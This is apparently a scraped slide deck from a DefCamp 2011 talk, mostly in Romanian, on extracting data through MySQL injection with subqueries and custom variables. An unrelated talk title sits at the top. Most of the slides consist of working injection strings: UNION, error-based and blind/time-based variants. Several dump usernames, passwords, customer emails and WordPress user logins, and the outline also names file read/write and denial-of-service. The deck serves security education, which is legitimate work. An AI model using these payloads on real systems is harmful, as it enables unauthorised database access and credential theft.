Scaling API-first – The story of a global engineering organization
Advanced data mining in my sql injections using subqueries and custom variables
1. DEFCAMP – 2011 “Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”
2. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ - CUPRINS - [ * ] Notiuni introductive: SQL , Injectii SQL [ * ] Variabile Particularizate si Sub-Interogari in MySQL [ * ] Optimizarea tehnicilor clasice de extragere a informatiilor : - variabile MySQL ( Server System Variables / Session Variables ) - bazele de date disponibile ( schema_name / SCHEMATA ) - tabelele si coloanele aferente acestora ( table_name / column_name ) - privilegii ( USER_PRIVILEGES : GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE ) - citirea & scrierea fisierelor ( LOAD_FILE / INTO DUMPFILE - OUTFILE) - atacuri Denial of Service ( DOS )
3. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Structured Query Language (SQL - limbajul structurat de interogare) este limbajul standard folosit pentru manipularea si regasirea datelor din baze de date relationale. Prin SQL, un programator sau un administrator de baze de date poate face urmatoarele lucruri: * sa modifice structura unei baze de date ; * sa schimbe valorile de configurare pentru securitatea sistemului; * sa adauge drepturi utilizatorilor asupra bazelor de date sau tabelelor; * sa interogheze o baza de date asupra unor informatii; * sa actualizeze continutul unei baze de date.
4. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Cum functioneaza PHP + MySQL ? < request-ul efectuat de catre client < procesarea request-ului la nivel de server < raspunsul trimis catre client ca rezultat al cererii
5. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ What could possibly go wrong ? !!!!!!
6. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ SQL Injections ( Injectii SQL ) – tehnica de malformare a sintaxei SQL datorata modificarii valorilor parametrilor $_GET, $_POST, cookies, headers, ce sunt preluate si prelucrate de fisierele server-side fara a filtra in prealabil caractere sau comenzi ce pot fi periculoase.
7. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Exemplu de injectie MySQL clasica.
8. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : UNION BASED index.php?id=1’ and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 -- index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1 index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5-- index.php? id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2 index.php?id=1+and+1=0+union+select+ sql_no_cache+1,2,3,4,5
9. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : UNION BASED
10. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : ERROR BASED index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+ Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+ news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- + details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))-- ?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--
11. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : ERROR BASED
12. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : BLIND index.php?id=1’ and substring(@@version,1,1)=4-- index.php?id=1’ and substring(@@version,1,1)=5-- index.php?id=1 and (SELECT 1 from admin limit 0,1)=1 news.php?id = -1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3)) index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1 index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103 script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) – script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
13. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Tipuri de injectii SQL : BLIND
14. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ MySQL Custom Variables (Variabile Particularizate)
15. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ MySQL Sub-Queries (Sub-Interogari) SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);
16. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind Custom Variables : CLASIC SYNTAX : index.php?id=2’+and+1=0+union+select+1,2,3,4,5-- NEW SYNTAX: index.php?id=2’+and+1=0+union+select+@i:=version(),@i,@i,@i,@i-- @i:=concat( version(),0x3a,database() ) @i:=cast(version()+as+binary) @i:=convert(version(),binary) @i:=convert(version()+using+latin1) @i:=aes_decrypt(aes_encrypt(version(),1),1) @x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)
17. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries : index.php?id = -1+union+select+*+from+users,(select+1,2,3,4,5,6)a-- index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select1,2,3,4,5)--+--X id=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
18. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries + Custom Variables : index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!=‘information_schema’) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4-- index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4 index.php?id=-7’ union (select * from (select @i:=version())q join (select@i)w join (select@i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx
19. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables _______________________________________________________________________ Injectii MySQL - folosind SubQueries + Custom Variables : index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--